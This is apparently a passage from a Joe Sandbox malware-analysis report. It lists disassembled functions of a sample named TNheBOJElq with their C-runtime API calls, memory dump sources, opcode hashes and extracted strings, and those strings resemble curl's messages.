                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E42253
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4226B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E42283
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4229B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E422B3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E422CB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E422E3
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 53d053f9df36d44db94e68ca4ca8ff7529476c4cf393f43a88ef05c65d73ff2f
                                    • Instruction ID: 8abebf3d9b771443ba8a6c91e52d44c97363f142354de758389761446c8d8dcc
                                    • Opcode Fuzzy Hash: 53d053f9df36d44db94e68ca4ca8ff7529476c4cf393f43a88ef05c65d73ff2f
                                    • Instruction Fuzzy Hash: E051B232504710CFDF199F11F84872A77E1EF54325F2480AEE9486B266DBB4AC08CF99
                                    Function 00E1F65C Relevance: 11.3, APIs: 9, Instructions: 60COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,766B3C50,00000000,00E2182F), ref: 00E1F671
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F685
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F699
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6AD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6C1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6D5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6E9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6FD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F70F
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 35bbe54a9b455fdcd9630f258c08f996e2c5324324a6bace36a11b29df183fea
                                    • Instruction ID: 3b664ccc126db7f591f270125d7326953b25a951d9e075034a34d6ba017e265c
                                    • Opcode Fuzzy Hash: 35bbe54a9b455fdcd9630f258c08f996e2c5324324a6bace36a11b29df183fea
                                    • Instruction Fuzzy Hash: B911B432614925DF8A092F26FC1845DBBA5EF486A2311842AE405A3671CFE82C198FD0
                                    Function 00E10F87 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 460stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I32,00000003,?,00000000,766A43D0,?,00E11589,?,?,?,?,00000000), ref: 00E11012
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: strncmp
                                    • String ID: I32$I64
                                    • API String ID: 1114863663-3980630743
                                    • Opcode ID: eb4e6430bb3eeb696bea1d09e797be4e4c06fd9f88115d30c506ce3f69f95b2c
                                    • Instruction ID: 563b7876c3062441b085850702712c7954e468adcf1d0591bdf320c14f718f9a
                                    • Opcode Fuzzy Hash: eb4e6430bb3eeb696bea1d09e797be4e4c06fd9f88115d30c506ce3f69f95b2c
                                    • Instruction Fuzzy Hash: 18F1B4B1E042059FDB1D8E6CC9A83FCBBA1EB45308F2861AED752F7665D2758AC0C740
                                    Function 00E22EBE Relevance: 10.8, APIs: 5, Strings: 2, Instructions: 263COMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22EDF
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22F0B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22F22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: calloc$free
                                    • String ID: pS$xk
                                    • API String ID: 171065143-2717256946
                                    • Opcode ID: 4ba920ea780fdca899eb9110c4fefb6ebd57cd599ab2f0765d7379f74344e1f0
                                    • Instruction ID: 9fcef4dec808b48ca0fa32937ffe7e72b8e33aac00f2a0e50d4859d8ab179acb
                                    • Opcode Fuzzy Hash: 4ba920ea780fdca899eb9110c4fefb6ebd57cd599ab2f0765d7379f74344e1f0
                                    • Instruction Fuzzy Hash: 96B19B75609691CFCB02CF28A8887D67BA1AF15314F1C90BADC08AF357D7769906CFA0
                                    Function 00E4D2D8 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166COMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB20
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB42
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB9C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4D01D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4D033
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$callocmallocrealloc
                                    • String ID:
                                    • API String ID: 4199894680-3916222277
                                    • Opcode ID: 5b1a95fd2021876e94c4075af0bb27e0540ba09f2143efc25c64eabeacd4f695
                                    • Instruction ID: 7248487987d8ea9930e47c6c81248f132cae4e2844a8ad80a66354a07c0d7b7e
                                    • Opcode Fuzzy Hash: 5b1a95fd2021876e94c4075af0bb27e0540ba09f2143efc25c64eabeacd4f695
                                    • Instruction Fuzzy Hash: 54518A31A08A129FCB28CF29E944665BBF1FF88328F248519D419A7B51D772FC94CB91
                                    Function 00E02BF8 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 166stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,00000000,00000001,00000000,?,?,00E0199D,00000000,?,?,00E01773), ref: 00E02C7A
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000001,?,00E0199D,00000000,?,?,00E01773), ref: 00E02C91
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\\?\,00000004), ref: 00E02CAE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004), ref: 00E02D52
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02D79
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$mallocstrncmpstrncpy
                                    • String ID: \\?\$|<>"?*
                                    • API String ID: 2141947759-3264285191
                                    • Opcode ID: 89ea5cbd3422b56c3e13a7d018552cf77dc6a32dec3db12bad9ebe3178482479
                                    • Instruction ID: 1081df5cee26f23f9c3bf359b269274d2a9e6d0727315d0dd7fbd5ca5a81e964
                                    • Opcode Fuzzy Hash: 89ea5cbd3422b56c3e13a7d018552cf77dc6a32dec3db12bad9ebe3178482479
                                    • Instruction Fuzzy Hash: 47514831A047469FEB258B24C89C7AEBBE5AB41308F28646DDF45BB2D6D7308DC4C790
                                    Function 00E15247 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 160stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strspn.API-MS-WIN-CRT-STRING-L1-1-0(00000005,0123456789abcdefABCDEF:.,00000000,00000000,?), ref: 00E15295
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00E628BC,00000002), ref: 00E152C7
                                    • inet_pton.WS2_32(00000017,00000005,?), ref: 00E1535F
                                    • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(00000004, /:#?!@,00000000,00000000,?), ref: 00E153D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: inet_ptonstrcspnstrncmpstrspn
                                    • String ID: /:#?!@$0123456789abcdefABCDEF:.
                                    • API String ID: 3548342379-4134865206
                                    • Opcode ID: 2b8b5401248dde653b0361ae282befbeaf57d66806259fbaa8b016a2f3bf64a6
                                    • Instruction ID: db4d94c78e50a2e7a294cbadc6342029beab67408fc3f4ff5b81190c8c0608bf
                                    • Opcode Fuzzy Hash: 2b8b5401248dde653b0361ae282befbeaf57d66806259fbaa8b016a2f3bf64a6
                                    • Instruction Fuzzy Hash: 73513733904B45CFDF24CB68DC407ED7BE49F82395F24286AD491F718AD7E0A9898B50
                                    Function 00E35FFA Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 145COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E36136
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: SMTPUTF8$%s %s%s$EXPN$HELP$T)$VRFY %s%s%s%s
                                    • API String ID: 1294909896-2790894696
                                    • Opcode ID: 7480437320f171c05f65853ec1be8acf383bf22ee19006dd4152a8b14ed9e9aa
                                    • Instruction ID: 266d7ae15e972d53d3d8f7282d961b920f7f900e7d4d2adc10bbe1ace4f05872
                                    • Opcode Fuzzy Hash: 7480437320f171c05f65853ec1be8acf383bf22ee19006dd4152a8b14ed9e9aa
                                    • Instruction Fuzzy Hash: 0A413B70A055156FDB288A688855ABB7FB9DF85318F28E0A9EC84F7212D660DD00CB90
                                    Function 00E3DB2C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strrchr.LIBCMT ref: 00E3DB47
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3DBC4
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3DBE8
                                      • Part of subcall function 00E4C864: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E3DB17), ref: 00E4C885
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3DC0E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3DC25
                                    Strings
                                    • Wildcard - Parsing started, xrefs: 00E3DCA0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$calloc$_strrchr
                                    • String ID: Wildcard - Parsing started
                                    • API String ID: 3895608051-2475583933
                                    • Opcode ID: 119e18e56d23ffd8db61a8ea2baafc89645839f771af3616e1874704656aedb3
                                    • Instruction ID: ccb8ff7026cfe4ffde9f4abee8190efb988d51a83577655a29201cdab694bd17
                                    • Opcode Fuzzy Hash: 119e18e56d23ffd8db61a8ea2baafc89645839f771af3616e1874704656aedb3
                                    • Instruction Fuzzy Hash: 67417B31618A16AFDB189F69FC5879ABFE4EF44365F20106AD409B72A1DBB02C44CB90
                                    Function 00E07A54 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07A80
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E07A9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupfree
                                    • String ID: o$output file name has no length
                                    • API String ID: 1865132094-237255669
                                    • Opcode ID: c207ba1054cdf33d55f588c981432b46d3419097f9eed5fdc7a71fd01d2a43d4
                                    • Instruction ID: 4ecf34c3fa4bf0f07743ec7a552606186ffb68c158ab85ef5dbef40d6c989645
                                    • Opcode Fuzzy Hash: c207ba1054cdf33d55f588c981432b46d3419097f9eed5fdc7a71fd01d2a43d4
                                    • Instruction Fuzzy Hash: 69417271A08B429FC365CF3498417A6B7E1AF45354F245E1DE5EAE72D0DB30E8C29B41
                                    Function 00E24C99 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E24D4E
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E24D65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrstrtol
                                    • String ID: %s%s%s$TQ$XQ
                                    • API String ID: 614545126-1620497692
                                    • Opcode ID: 61397ab722185b56720bbb7d9af7e0a17227049d19eb7561f5ee1ed01983cb8b
                                    • Instruction ID: b508151f360a7d0db1698b88664d72c2b778a1704b512ecdcea63540ed9d7508
                                    • Opcode Fuzzy Hash: 61397ab722185b56720bbb7d9af7e0a17227049d19eb7561f5ee1ed01983cb8b
                                    • Instruction Fuzzy Hash: D43145B6604755EFDF16CF58E8409ADBBA5EF81314F2495A9E841AB381D7705E04CB40
                                    Function 00E0D77A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0D7AC
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0D7B7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E0D8B0
                                    Strings
                                    • %s:%s, xrefs: 00E0D897
                                    • Enter %s password for user '%s':, xrefs: 00E0D836
                                    • Enter %s password for user '%s' on URL #%zu:, xrefs: 00E0D85B
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr$free
                                    • String ID: %s:%s$Enter %s password for user '%s' on URL #%zu:$Enter %s password for user '%s':
                                    • API String ID: 3654317688-2337704101
                                    • Opcode ID: c39ba2a406992aee6620bf5faaafcdbf8134aabb1a04205e9160d19bbf30979f
                                    • Instruction ID: 9efde377b50d15fd2979139415855e9896fe04673873b14e0ba30a7b08e229ff
                                    • Opcode Fuzzy Hash: c39ba2a406992aee6620bf5faaafcdbf8134aabb1a04205e9160d19bbf30979f
                                    • Instruction Fuzzy Hash: BF31F571A0521AAFEB25DBA4DC41BDABBF4AF18304F1054E5E548B7182DB70ABD4CF50
                                    Function 00E2AF15 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 103COMMON
                                    Download Yara Rule
                                    APIs
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000000), ref: 00E2B02A
                                    Strings
                                    • ioctl callback returned error %d, xrefs: 00E2B00D
                                    • seek callback returned error %d, xrefs: 00E2AFAE
                                    • necessary data rewind wasn't possible, xrefs: 00E2B038
                                    • the ioctl callback returned %d, xrefs: 00E2AFFA
                                    • Cannot rewind mime/post data, xrefs: 00E2B048
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fseek
                                    • String ID: Cannot rewind mime/post data$ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
                                    • API String ID: 623662203-539828175
                                    • Opcode ID: 5711de9846499b234f7aefd0a516604038c3e589945408e8ce3c6907525eda9e
                                    • Instruction ID: c353cd288e172d58ea0aacc89ac77f26852c9ca7686dc27db412975f9dcb668c
                                    • Opcode Fuzzy Hash: 5711de9846499b234f7aefd0a516604038c3e589945408e8ce3c6907525eda9e
                                    • Instruction Fuzzy Hash: 39313631700612EFC6295B31ACD9EFBB795FF50359F082265F42977191CB602C54D791
                                    Function 00E09CAA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00E09CB9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E09CCD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09D63
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09D74
                                    Strings
                                    • Got more output options than URLs, xrefs: 00E09D9F
                                    • out of memory, xrefs: 00E09CDC
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_strdup
                                    • String ID: Got more output options than URLs$out of memory
                                    • API String ID: 2653869212-1666425204
                                    • Opcode ID: 48099a9eac7edda1cd5c99b1c0037c23762171659a72e99af1c639d551d53a76
                                    • Instruction ID: 159ac1a5734ffe2acd3faa7b39c573a83e3a474db1bced8f382f8e90ca6b0c64
                                    • Opcode Fuzzy Hash: 48099a9eac7edda1cd5c99b1c0037c23762171659a72e99af1c639d551d53a76
                                    • Instruction Fuzzy Hash: B0319E356483469FDB058F64E899B987BF1BB44325F28507AE805AF2D3DB7098C4CB50
                                    Function 00E21AEE Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON
                                    Download Yara Rule
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,766B1980,?,00E21D52,?,?,?,?,00E08B8E), ref: 00E21AF5
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00E21D52,?,?,?,?,00E08B8E), ref: 00E21B03
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00E21D52,?,?,?,?,00E08B8E), ref: 00E21B11
                                      • Part of subcall function 00E27EC3: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E28849,00000000,?,?,?,00E12373,?,?,?,?,00E016C6,?,00200030), ref: 00E27F33
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func$free
                                    • String ID: <$`$v
                                    • API String ID: 1664282339-4007386528
                                    • Opcode ID: f3b5b299b537385079c1b435ebf322c43d3d7ac3ba913dbe3e1730b454aa3e3d
                                    • Instruction ID: 1aa5190ba756c9ba14e4a4cd432c53ba1fea3f0ffa3316d632aa9538163def5a
                                    • Opcode Fuzzy Hash: f3b5b299b537385079c1b435ebf322c43d3d7ac3ba913dbe3e1730b454aa3e3d
                                    • Instruction Fuzzy Hash: 0B51B0B09097408AEB54CF29D8C87C53BA0AF99714F1841BAED4C9F29BD7B91148CF65
                                    Function 00E26806 Relevance: 10.6, APIs: 7, Instructions: 91fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 00E2681E
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57A20,?,?,00000000), ref: 00E26848
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2686D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26887
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E2688F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E268E3
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E268E7
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$fclose$fopenmalloc
                                    • String ID:
                                    • API String ID: 2597608617-0
